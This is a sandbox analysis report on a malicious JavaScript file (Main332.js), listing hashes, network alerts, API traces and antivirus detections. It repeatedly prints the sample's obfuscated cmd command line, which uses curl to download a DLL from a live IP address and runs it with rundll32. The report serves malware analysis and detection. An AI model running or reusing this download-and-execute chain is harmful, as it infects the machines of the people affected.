Summary | ZeroBOX

Main332.js

AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 26, 2023, 10:30 a.m. Oct. 26, 2023, 10:32 a.m.
Size 324.5KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 c3cc912df10bafc0de538be5557710ac
SHA256 d9d476bb05bec88f0ca70145821f41d139d9b401b915dc757021144cedc9bccd
CRC32 17A00D94
ssdeep 6144:G9CBblbPUmwEwvP6IoPalJvwXoJwnk0TnPAGS:G9CBZbPUV1YkmAGS
Yara None matched

Name Response Post-Analysis Lookup
www.ssl.com 54.87.241.101
IP Address Status Action
164.124.101.2 Active Moloch
34.195.117.81 Active Moloch
49.13.119.73 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 49.13.119.73:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak
TCP 192.168.56.101:49167 -> 49.13.119.73:80 2034567 ET HUNTING curl User-Agent to Dotted Quad Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'Yjkc' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: Yjkc
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host Yjkc. Please check the name and try again.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host Yjkc. Please check the name and try again.
console_handle: 0x00000007
1 1 0
suspicious_features Connection to IP address suspicious_request GET http://49.13.119.73/GJDtkud/Aerot
request GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
request GET http://49.13.119.73/GJDtkud/Aerot
cmdline "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
cmdline cmd.exe /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
filepath: cmd.exe
1 1 0
Kaspersky HEUR:Trojan.Script.Generic
Microsoft Trojan:Script/Wacatac.B!ml
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
cmdline cmd.exe /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
cmdline piNg -n 4 Yjkc
cmdline piNg Yjkc
host 49.13.119.73
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 964
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 964
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
parent_process wscript.exe martian_process cmd.exe /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
Process injection Process 2580 resumed a thread in remote process 2728
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004e0
suspend_count: 1
process_identifier: 2728
1 0 0
file C:\Windows\System32\cmd.exe